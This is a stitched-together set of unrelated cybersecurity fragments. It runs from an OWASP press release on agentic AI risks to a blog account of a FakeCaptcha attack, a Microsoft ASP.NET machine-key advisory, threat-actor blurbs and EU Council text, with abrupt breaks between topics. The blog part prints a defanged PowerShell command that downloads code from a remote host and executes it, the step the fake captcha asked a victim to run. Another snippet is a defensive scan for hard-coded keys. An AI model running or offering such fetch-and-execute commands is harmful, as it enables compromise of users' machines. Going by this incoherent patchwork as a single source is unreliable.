WILMINGTON, Del., Dec. 10, 2025 /PRNewswire/ -- The OWASP GenAI Security Project (genai.owasp.org), a leading global open-source and expert community dedicated to delivering practical guidance and tools for securing generative and agentic AI, today released the OWASP Top 10 for Agentic Applications, a key resource to help organizations identify and mitigate the unique risks posed by autonomous AI agents.
Following more than a year of research, review and refinement, this Top 10 list reflects the culmination of input from more than 100 security researchers, industry practitioners, user organizations and leading cybersecurity and generative AI technology providers. The result is not only a list of risks and mitigations, but a suite of practitioner-focused resources that provide data-driven guidance.
The framework was further evaluated by the GenAI Security Project's Agentic Security Initiative Expert Review Board, which includes representatives from recognized bodies around the world such as NIST, the European Commission and the Alan Turing Institute, among others. A full list of contributing organizations can be found here.
"This new OWASP Top 10 reflects incredible collaboration between AI security leaders and practitioners across the industry," said Scott Clinton, the OWASP GenAI Security Project's Co-Chair, Board Member, and Co-Founder. "As AI adoption accelerates faster than ever, security best practices must keep pace. The community's responsiveness has been remarkable, and this Top 10, along with our broader open-source resources, ensures organizations are better equipped to adopt this technology safely and securely."
Agent Behavior Hijacking, Tool Misuse and Exploitation, and Identity and Privilege Abuse are among the threats highlighted in the Top 10, showcasing how attackers can subvert agent capabilities or their supporting infrastructure. As agentic systems become increasingly capable across industries, incidents involving them are on the rise, elevating the need for these new resources.
"Companies are already exposed to Agentic AI attacks - often without realizing that agents are running in their environments," said Keren Katz, Co-Lead for OWASP's Top 10 for Agentic AI Applications and Senior Group Manager of AI Security at Tenable. "While the threat is already here, the information available about this new attack vector is overwhelming. Effectively protecting a company against Agentic AI requires not only strong security intuition but also a deep understanding of how AI agents fundamentally operate."
"Agentic AI introduces a fundamentally new threshold of security challenges, and we are already seeing real incidents emerge across industry," said John Sotiropoulos, GenAI Security Project Board member, Agentic Security Initiative and Top 10 for Agentic Applications Co-lead, and Head of AI Security at Kainose. "Our response must match the pace of innovation, which is why this Top 10 focuses on practical, actionable guidance grounded in real-world attacks and mitigations. This release marks a pivotal moment in securing the next generation of autonomous AI systems."
The Top 10 for Agentic Applications joins a growing portfolio of peer-reviewed resources released by the OWASP GenAI Security Project and its Agentic Security Initiative, including:
The State of Agentic Security and Governance 1.0: A practical guide to the governance and regulations for the safe and responsible deployment of autonomous AI systems.
The Agentic Security Solutions Landscape: A quarterly, peer-reviewed map of open-source and commercial agentic AI tools and how they support SecOps and mitigate DevOps–SecOps risks.
A Practical Guide to Securing Agentic Applications: Practical technical guidance for securely designing and deploying LLM-powered agentic applications.
Reference Application for Agentic Security: An OWASP FinBot Capture The Flag application, designed to test and practice agentic security skills in a controlled environment.
Agentic AI Threats and Mitigations: This document is the first in a series to provide a threat-model-based reference of emerging agentic threats and discuss mitigations.
And more
"Over the past two and a half years, the OWASP Top 10 for LLM Applications has shaped much of the industry's thinking on AI security," said, Steve Wilson, OWASP GenAI Security Project Board Co-Chair, Founder of OWASP Top 10 for LLM, and CPO of Exabeam, Inc. "This year, we've seen agentic systems move from experiments to real deployments, and that shift brings a different class of threats into clear view. Our team met that challenge by expanding our guidance to address how agentic systems behave, interact, and make decisions. The LLM Top 10 will remain a core, regularly updated resource, and aligning both efforts is key to helping the community build safer, more reliable intelligent systems.
Discover what industry experts, researchers and leading global organizations have to say about the new Top 10 for Agentic Applications here.
The OWASP GenAI Security Project invites organizations, researchers, policymakers and practitioners to access the new Top 10 for Agentic Applications, contribute to future updates and join the global effort to build secure, trustworthy AI systems. Visit our site to learn more and find out how you can contribute.
About OWASP Gen AI Security Project
The OWASP Gen AI Security Project (genai.owasp.org) is a global, open-source initiative and expert community dedicated to identifying, mitigating, and documenting security and safety risks associated with generative AI technologies, including large language models (LLMs), agentic AI systems, and AI-driven applications. Our mission is to empower organizations, security professionals, AI practitioners, and policymakers with comprehensive, actionable guidance and tools to ensure the secure development, deployment, and governance of generative AI systems. Visit our site to learn more.
Key Deliverables
Developing a rigorous scoring system for Agentic AI Top 10 vulnerabilities, leading to a comprehensive AIVSS framework for all AI systems.
Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life (finished university, started a new job, etc.), I am happy to finally be able to present something new.
Chapter 1: Captcha-verified Victim
This story starts with a message from one of my long-time internet contacts:
Figure 1: Shit hit the Fan
I assume some of you can already tell from this message alone that something terrible had just happened to him.
The legitimate website of the German Association for International Law had redirected him to what appeared to be a Cloudflare captcha page, asking him to execute a PowerShell command on his device that performs a web request (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into "iex", which stands for Invoke-Expression.
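To make the pattern concrete, here is a minimal, deliberately defanged sketch of what such a one-liner typically looks like; the path is omitted and this is only the shape of the technique, not the exact command from the incident:

# Defanged illustration of the FakeCaptcha one-liner described above.
# iwr (Invoke-WebRequest) fetches remote content, and piping it into
# iex (Invoke-Expression) executes the fetched text as PowerShell.
# Deliberately defanged so it cannot be run as-is.
iwr "hxxps://amoliera[.]com/..." | iex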
That's a textbook example of a so-called FakeCaptcha attack.
For those of you who do not know what the FakeCaptcha attack technique is, let me give you a short primer:
A Captcha in itself is a legitimate method website owners use to differentiate between bots (automated traffic) and real human users. It usually involves at least clicking a button, but can additionally require the website visitor to solve various small tasks, such as selecting certain images from a collection of random images or identifying a set of obscurely written letters. The goal is to only let users visit the website who are able to solve these tasks, which are designed to be hard for computers but easy for human beings. Well, most of the time.
Microsoft Threat Intelligence observed limited activity by an unattributed threat actor using a publicly available, static ASP.NET machine key to inject malicious code and deliver the Godzilla post-exploitation framework. In the course of investigating, remediating, and building protections against this activity, we observed an insecure practice whereby developers have incorporated various publicly disclosed ASP.NET machine keys from publicly accessible resources, such as code documentation and repositories, which threat actors have used to launch ViewState code injection attacks and perform malicious actions on target servers.
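As a rough aid for hunting the insecure practice described above, the following minimal PowerShell sketch flags web.config files that contain a hard-coded <machineKey> element; the search root C:\inetpub is only an assumed default, and any findings still need manual comparison against lists of publicly disclosed keys:

# Minimal sketch (assumed search root): list web.config files that contain a
# hard-coded <machineKey> element, a candidate for a reused, publicly
# disclosed key. Results require manual review against known-key lists.
Get-ChildItem -Path "C:\inetpub" -Recurse -Filter "web.config" -ErrorAction SilentlyContinue |
    Select-String -Pattern "<machineKey" -SimpleMatch |
    Select-Object -Property Path, LineNumber, Line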
MuddyC2Go framework and custom keylogger used in attack campaign.
Iranian espionage group Seedworm (aka Muddywater) has been targeting organizations operating in the telecommunications sector in Egypt, Sudan, and Tanzania.
Seedworm has been active since at least 2017, and has targeted organizations in many countries, though it is most strongly associated with attacks on organizations in the Middle East. It has been publicly stated that Seedworm is a cyberespionage group that is believed to be a subordinate part of Iran’s Ministry of Intelligence and Security (MOIS).
Summary
Snake, also known as Turla, Uroburos and Agent.BTZ, is a relatively complex malware framework used for targeted attacks. Over the past year Fox-IT has been involved in multiple incident response cases where the Snake framework was used to steal sensitive information. Targets include government institutions, military and large corporates. Researchers who have previously analyzed…
RECALLS the relevant conclusions of the European Council [1] and the Council [2], ACKNOWLEDGES that state and non-state actors are increasingly using hybrid tactics, posing a growing threat to the security of the EU, its Member States and its partners [3]. RECOGNISES that, for some actors applying such tactics, peacetime is a period for covert malign activities, when a conflict can continue or be prepared for in a less open form. EMPHASISES that state actors and non-state actors also use information manipulation and other tactics to interfere in democratic processes and to mislead and deceive citizens. NOTES that Russia's armed aggression against Ukraine is showing the readiness to use the highest level of military force, regardless of legal or humanitarian considerations, combined with hybrid tactics, cyberattacks, foreign information manipulation and interference, economic and energy coercion and an aggressive nuclear rhetoric, and ACKNOWLEDGES the related risks of potential spillover effects in EU neighbourhoods that could harm the interests of the EU.